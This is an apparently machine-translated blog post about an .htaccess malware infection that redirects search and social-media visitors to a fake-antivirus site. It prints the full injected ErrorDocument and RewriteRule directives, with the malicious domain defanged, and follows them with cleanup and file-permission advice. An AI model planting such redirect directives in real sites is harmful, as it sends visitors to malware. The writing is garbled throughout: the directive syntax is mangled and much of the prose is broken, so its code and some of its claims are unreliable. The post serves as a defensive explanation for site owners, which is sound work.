Malware / Virus - .htaccess "rewrite" & redirect

A new form of virus who see that not know very much affects sites hosted on unreliable servers where user accounts / subdomain accounts can be "seen" between them. Specifically, the hosting accounts are all put in the folder "vhosts", and the writing right of user folder from "vhosts" is given to a general user… by the reseller in most situations. It is a typical method of web servers that do not use WHM / cPanel.

.Htaccess virus action - .htaccess hack

Virus affects files .htaccess the victim site. Lines are added / Directives to redirect visitors (come from yahoo, msn, google, facebook, yaindex, twitter, myspace, etc. high traffic sites and portals) to some sites that offer "antivirus". It's about fake antivirus, About which I wrote in the introduction to .

This is how .htaccess affected: (not access the content URLs lines below)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Search. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond% {REQUEST_FILENAME}!. * Jpg $ |. * Gif $ |. * Png $
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Those who use WordPress will find these lines in the file .htaccess from public_html. In addition, the virus creates a. Htaccess file in the same folder wp-content.

*There are also situations in which instead appears peoriavascularsurgery.com dns.thesoulfoodcafe.com or other addresses.

What makes this virus.

Once redirected, the visitor is greeted with open arms by the message:

Warning!
Your computer contains various signs of viruses and malware programs Presence. Your anti virus system Requires immediate check!
Security System Will perform a quick and free scanning of your PC for viruses and malicious programs.

1 malware

No matter which button we press, we are taken to the "My Computer", created to imitate XP design. This is where the "scan process" starts automatically, at the end of which we discover that "we are infected".

2 malware

After you click OK or Cancel, it will start download for freeFile's setup.exe. This setup.exe is fake anti virus affecting the system. Install some malware to propagate further links compromised, and besides these a anti-virus software (also fake) that the victim is invited to buy.
Those who have already contacted the virus may use this form . It is also recommended to scan the entire HDD. Recommend Kaspersky Internet Security or Kaspersky Anti-Virus.

This type of virus affects Visitor OS operating systems Windows XP, Windows ME Windows 2000, Windows NT, Windows 98 si Windows 95. So far no known cases of infection of the operating systems Windows Sight yes Windows 7.

How can we eliminate this virus. Htaccess file on the server and how to prevent infection.

1. Analyze suspicious files and erasing codes. To ensure that the file is not affected only .htaccess you should analyze all files . Php si . Js.

2. Rewrite the file. Htaccess and it set the chmod 644 or 744 with write access only owner's user.

3. When you create a hosting account for a website in folder / Home or / Webroot This will automatically create a folder which often has the user's name (user for cpanel, ftpEtc.). To prevent writing data and transmitting viruses from one user to another, it is recommended that each user folder to be set:

chmod 644 or 744, 755 - indicated is 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

ls-all ways to check if they were made correctly. Should appear something like this:

drwx – x – x 12 dinamics dinamics 4096 May 6 14:51 dinamics /
drwx – x – x 10 duran duran 4096 Mar 7 07:46 duran /
drwx – x – x 12 test tube test tube 4096 Jan 29 11:23 test tube /
drwxr-xr-x 14 express express 4096 Feb 26 2009 express /
drwxr-xr-x 9 ezo ezo 4096 May 19 01:09 ezo /
drwx – x – x 9 farma farma 4096 Dec 19 22:29 farma /

If one of the above will userele FTP Infected filesIt can not send the virus to another user host. Is a minimum safety measure to protect the accounts hosted on a web server.

Common elements of areas affected by this virus.

All affected domains redirect visitors to sites that contain the domain name "/".

This "virus. htaccess"affects any type of CMS (Joomla, WordPress, phpBBEtc.) using .htaccess

.htaccess Virus Hack & Redirect.

Malware / Virus - .htaccess "rewrite" & redirect

About the author

Stealth LP

Founder and editor Stealth SettingsIn 2006 date.
Experience on Linux operating systems (especially CentOS), Mac OS X, Windows XP> Windows 10 and WordPress (CMS).

Leave a Comment